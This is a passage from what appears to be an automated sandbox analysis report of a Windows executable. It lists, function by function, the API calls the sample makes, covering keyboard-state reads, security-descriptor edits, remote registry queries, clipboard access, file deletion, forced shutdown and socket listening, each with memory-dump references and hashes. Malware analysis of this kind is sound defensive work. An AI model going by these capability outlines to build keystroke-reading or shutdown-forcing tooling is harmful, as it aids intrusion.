                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0094A337
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0094A341
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                • String ID: :$\$\??\%s
                                                                                                                • API String ID: 2733774712-3457252023
                                                                                                                • Opcode ID: 3599c6266e44af790aa60308f5d45127372c921125baca21cfe6044f26e35bf7
                                                                                                                • Instruction ID: 05cd545d2a21c737ab94659d2c7d947648455903ae532ffd5f259422aa393026
                                                                                                                • Opcode Fuzzy Hash: 3599c6266e44af790aa60308f5d45127372c921125baca21cfe6044f26e35bf7
                                                                                                                • Instruction Fuzzy Hash: 3B31C7B1944109ABDB21DFA0DC49FEB37BCEF89740F1041BAF518D6160E7B096449B65
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00938202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0093821E
                                                                                                                  • Part of subcall function 00938202: GetLastError.KERNEL32(?,00937CE2,?,?,?), ref: 00938228
                                                                                                                  • Part of subcall function 00938202: GetProcessHeap.KERNEL32(00000008,?,?,00937CE2,?,?,?), ref: 00938237
                                                                                                                  • Part of subcall function 00938202: HeapAlloc.KERNEL32(00000000,?,00937CE2,?,?,?), ref: 0093823E
                                                                                                                  • Part of subcall function 00938202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00938255
                                                                                                                  • Part of subcall function 0093829F: GetProcessHeap.KERNEL32(00000008,00937CF8,00000000,00000000,?,00937CF8,?), ref: 009382AB
                                                                                                                  • Part of subcall function 0093829F: HeapAlloc.KERNEL32(00000000,?,00937CF8,?), ref: 009382B2
                                                                                                                  • Part of subcall function 0093829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00937CF8,?), ref: 009382C3
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00937D13
                                                                                                                • _memset.LIBCMT ref: 00937D28
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00937D47
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00937D58
                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00937D95
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00937DB1
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00937DCE
                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00937DDD
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00937DE4
                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00937E05
                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00937E0C
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00937E3D
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00937E63
                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00937E77
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3996160137-0
                                                                                                                • Opcode ID: 81c2a938ed68fce5d90bf070f71321bbd3c671031672dad858d3685093c2e5ca
                                                                                                                • Instruction ID: 3fb69a10956afbca9746349bc21818cee60f343a067d5d32be3105887dd4199f
                                                                                                                • Opcode Fuzzy Hash: 81c2a938ed68fce5d90bf070f71321bbd3c671031672dad858d3685093c2e5ca
                                                                                                                • Instruction Fuzzy Hash: C5612DB1904209BFDF209FA4EC45AAEBB79FF48700F048169F915A62A1DB719E05DF60
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                • API String ID: 0-4052911093
                                                                                                                • Opcode ID: 3632221e0b626c59a9cab286fcd3344dae426ab4ae291134810a8edf02111614
                                                                                                                • Instruction ID: c9ebdac390d01223883e77ac6373eec0ccc96978c942da3087708df550395b63
                                                                                                                • Opcode Fuzzy Hash: 3632221e0b626c59a9cab286fcd3344dae426ab4ae291134810a8edf02111614
                                                                                                                • Instruction Fuzzy Hash: DC725F75E00219DBDB24CF68C8817BEB7B5FF44710F14826AE959EB291EB349981CF90
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?), ref: 00940097
                                                                                                                • SetKeyboardState.USER32(?), ref: 00940102
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00940122
                                                                                                                • GetKeyState.USER32(000000A0), ref: 00940139
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00940168
                                                                                                                • GetKeyState.USER32(000000A1), ref: 00940179
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 009401A5
                                                                                                                • GetKeyState.USER32(00000011), ref: 009401B3
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 009401DC
                                                                                                                • GetKeyState.USER32(00000012), ref: 009401EA
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00940213
                                                                                                                • GetKeyState.USER32(0000005B), ref: 00940221
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                • Opcode ID: fc9533ea7da73344aa8215ed4305e02815b13583e0114656255d3f349616da4e
                                                                                                                • Instruction ID: f3694470d966898288ad1245aab57a717aeaa90c539b94fba79b3b480813a1b2
                                                                                                                • Opcode Fuzzy Hash: fc9533ea7da73344aa8215ed4305e02815b13583e0114656255d3f349616da4e
                                                                                                                • Instruction Fuzzy Hash: E151BF2090878859FB35DB708855FEABFB89F81380F08459ED6C6575C3D6B49B8CCB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00960E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0095FDAD,?,?), ref: 00960E31
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009604AC
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0096054B
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009605E3
                                                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00960822
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0096082F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1240663315-0
                                                                                                                • Opcode ID: 986a5843d92dff5dd60843f4bda4e64b714bf3169dfdefe5e0656d4374f8cb6c
                                                                                                                • Instruction ID: c174ec1bf48a43c36aa4af438d973aa7b501aa3f29031f6531bb626b53303304
                                                                                                                • Opcode Fuzzy Hash: 986a5843d92dff5dd60843f4bda4e64b714bf3169dfdefe5e0656d4374f8cb6c
                                                                                                                • Instruction Fuzzy Hash: 1DE14E71604214AFCB14DF29C895E6BBBE8FF89314F04896DF54ADB261DA31ED01CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1737998785-0
                                                                                                                • Opcode ID: b8d0afe631d9d8befefa1aba7da5be72620468320ea08b01a68106b7a3b18831
                                                                                                                • Instruction ID: 75ad10fc8d50aea0fb0a3a76cabcb7c40e977733d1a017d90c0773ba6643b455
                                                                                                                • Opcode Fuzzy Hash: b8d0afe631d9d8befefa1aba7da5be72620468320ea08b01a68106b7a3b18831
                                                                                                                • Instruction Fuzzy Hash: E221D135208614AFDB00AF25EC19B6D7BA8FF55711F00802AFD46DB2B1CBB0AC40DB95
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E4743,?,?,008E37AE,?), ref: 008E4770
                                                                                                                  • Part of subcall function 00944A31: GetFileAttributesW.KERNEL32(?,0094370B), ref: 00944A32
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 009438A3
                                                                                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0094394B
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0094395E
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0094397B
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0094399D
                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 009439B9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 4002782344-1173974218
                                                                                                                • Opcode ID: c1a94991c48f48ac12794b69c9073740b984b670b0407dec5bfcc94e778d985a
                                                                                                                • Instruction ID: a02b9569cc1fbbade1dc70fa271a41a615feb64d32c6146a17877fc1c390aaac
                                                                                                                • Opcode Fuzzy Hash: c1a94991c48f48ac12794b69c9073740b984b670b0407dec5bfcc94e778d985a
                                                                                                                • Instruction Fuzzy Hash: 5B517F3180518CAACF05FBB5D992DEDB778BF16304F604069E406B7192EB716F09CB62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0094F440
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0094F470
                                                                                                                • _wcscmp.LIBCMT ref: 0094F484
                                                                                                                • _wcscmp.LIBCMT ref: 0094F49F
                                                                                                                • FindNextFileW.KERNEL32(?,?), ref: 0094F53D
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094F553
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 713712311-438819550
                                                                                                                • Opcode ID: 96a611decced772e72d74b2eee91395334a9c769f4ef43e0cf7658ee933f139c
                                                                                                                • Instruction ID: 3b4b1e4b82d557da173b081cecc46545246679a538d6ed7ef6f3b97813d26f42
                                                                                                                • Opcode Fuzzy Hash: 96a611decced772e72d74b2eee91395334a9c769f4ef43e0cf7658ee933f139c
                                                                                                                • Instruction Fuzzy Hash: 80413C7190425AAFCF14DF68DC69EEEBBB8FF05314F14446AF819A21A1EB309A44CF51
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 69c257e97349c85b4bd6f1849c35843fee9471fdc39c14d410b08ba4112121cc
                                                                                                                • Instruction ID: f24d14b32d8fee9592124d8c7f7ac22e8dab3df3041e152444c8e9cd39892b01
                                                                                                                • Opcode Fuzzy Hash: 69c257e97349c85b4bd6f1849c35843fee9471fdc39c14d410b08ba4112121cc
                                                                                                                • Instruction Fuzzy Hash: 8A128A70A00609DFDF04DFA9D991AAEB7F5FF88304F104529E54AE7290EB35AD21CB61
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E4743,?,?,008E37AE,?), ref: 008E4770
                                                                                                                  • Part of subcall function 00944A31: GetFileAttributesW.KERNEL32(?,0094370B), ref: 00944A32
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00943B89
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00943BD9
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00943BEA
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00943C01
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00943C0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 2649000838-1173974218
                                                                                                                • Opcode ID: 48126040ed200666dda4c76ec4cb354f828551b5bbc62c67125a9c8719598a68
                                                                                                                • Instruction ID: 9e0b08f057f22a183a007f2b14504e5bcbbdd1726efcec771e33330620a3dfd3
                                                                                                                • Opcode Fuzzy Hash: 48126040ed200666dda4c76ec4cb354f828551b5bbc62c67125a9c8719598a68
                                                                                                                • Instruction Fuzzy Hash: 59315E3100C3859BC601EB68D891DAFBBACFE92314F444D2DF4E692191EB21DA08DB53
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009387E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0093882B
                                                                                                                  • Part of subcall function 009387E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00938858
                                                                                                                  • Part of subcall function 009387E1: GetLastError.KERNEL32 ref: 00938865
                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 009451F9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                                                • API String ID: 2234035333-194228
                                                                                                                • Opcode ID: 8eb34152bd8c2f47ee9d6216700d0c54379234ec7271fc971094b21b61e49d77
                                                                                                                • Instruction ID: bfeef05c9d0cafd5af81090216372ad47f59642eec76a3eb219e6d7a9f50f6c1
                                                                                                                • Opcode Fuzzy Hash: 8eb34152bd8c2f47ee9d6216700d0c54379234ec7271fc971094b21b61e49d77
                                                                                                                • Instruction Fuzzy Hash: C2014E317A56116BFB2866F8AC9BFBB725CDB05750F220826F933E20D3DAD15C00C690
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009562DC
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009562EB
                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00956307
                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00956316
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00956330
                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00956344
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279440585-0
                                                                                                                • Opcode ID: 92eef5be44a7e147ecb113a30ee276642c4c6bcece986caa60d40ea80f90b78f
                                                                                                                • Instruction ID: e8ff8c5b1b829aada962db27aaa0398563b1a62dd81a8a06e17fa46d4d8c9948
                                                                                                                • Opcode Fuzzy Hash: 92eef5be44a7e147ecb113a30ee276642c4c6bcece986caa60d40ea80f90b78f
                                                                                                                • Instruction Fuzzy Hash: 1B21D031600210AFCB00EF69D849B6EB7A9FF89321F548168FC56E73A1CBB0AD05DB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00900DB6: std::exception::exception.LIBCMT ref: 00900DEC
                                                                                                                  • Part of subcall function 00900DB6: __CxxThrowException@8.LIBCMT ref: 00900E01
                                                                                                                • _memmove.LIBCMT ref: 00930258
                                                                                                                • _memmove.LIBCMT ref: 0093036D
                                                                                                                • _memmove.LIBCMT ref: 00930414
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1300846289-0
                                                                                                                • Opcode ID: 81656df518a5eee7a3042ccd8eafea61ea4dbc387c1361c5fd960561490da342
                                                                                                                • Instruction ID: 0b24cbf5027fcd9f4c60d71bf1597fe7d77ed981d37e700acf15b2183ae68d9f
                                                                                                                • Opcode Fuzzy Hash: 81656df518a5eee7a3042ccd8eafea61ea4dbc387c1361c5fd960561490da342
                                                                                                                • Instruction Fuzzy Hash: B202AF70A00609DFCF04DF69D991ABEBBB5FF84300F148469E90ADB295EB35DA50CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 008E19FA
                                                                                                                • GetSysColor.USER32(0000000F), ref: 008E1A4E
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 008E1A61
                                                                                                                  • Part of subcall function 008E1290: DefDlgProcW.USER32(?,00000020,?), ref: 008E12D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorProc$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3744519093-0
                                                                                                                • Opcode ID: a640b1a802ad9ad1fa0cbc7f3b84936573a63daeb365c26390eaa88c43ed9a5c
                                                                                                                • Instruction ID: 2aa27cfad2f7a3cea8cd6b16eb47a9cd7e96db6bcf8705e68ba7045e7e2b01d4
                                                                                                                • Opcode Fuzzy Hash: a640b1a802ad9ad1fa0cbc7f3b84936573a63daeb365c26390eaa88c43ed9a5c
